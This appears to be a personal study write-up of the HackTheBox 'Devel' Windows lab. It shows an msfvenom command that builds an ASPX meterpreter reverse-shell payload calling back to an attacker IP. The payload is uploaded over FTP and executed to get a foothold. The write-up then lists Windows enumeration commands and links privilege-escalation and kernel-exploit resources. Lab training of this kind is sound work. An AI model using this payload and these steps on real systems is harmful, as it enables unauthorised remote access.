The Devel ( Box 1)¶
Enumeration :¶
nmap -A -T4 -p- <Machine_IP>
The wappalyzer shows the Web Servers is IID 7.5
msfvenom -p windows/meterpreter/reverse_tcp LHOST= 10.10.14.4 LPORT= 4444 -f aspx > exploit.aspx
What we are doing here is again connecting to ftp server via it's credentials then uploading the exploit to the website.
put exploit.aspx
Execute the exploit :
Boom we are in : >
The steps which we performed earlier are to gain access for low level user from here we are going to leverage out current role : IIS APPPOOL/web to higher privelage or system level user to be specific.
Further System Enumeration¶
WMIC > Windows Management Instrumentation Command-line¶
It's a command-line utility that provides a way to interact with and manage data and operations on a Windows system using Windows Management Instrumentation (WMI). WMIC is used to retrieve information about hardware, software, and other system aspects.
The qfe > is quick fix engineering¶
wmic logicaldisk get caption, description, providername
USER BASED ENUMERATION¶
Network Enumeration¶
ipconfig
ipconfig /all
arp -a
route print
netstart -ano > to check all the ports
Password Hunting¶
Privilege Escalation - Windows · Total OSCP Guide
Windows - Privilege Escalation - Internal All The Things
AV Enumeration¶
This section is for Antivirus and Firewall configuration
sc is service control
It will tell about all the services running in the Windows : XD¶
To check the firewall is running or not¶
netsh firewall show config > Displays the config of Firewall¶
Before all the things were to learn how to perform things manually !
Automated Tool Overview¶
All the tools are for Windows purpose¶
These are all the vulnerabilities which we got via Metasploirt.
Escalation Path: Kernel Exploits¶
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
Windows Kernel Architecture¶
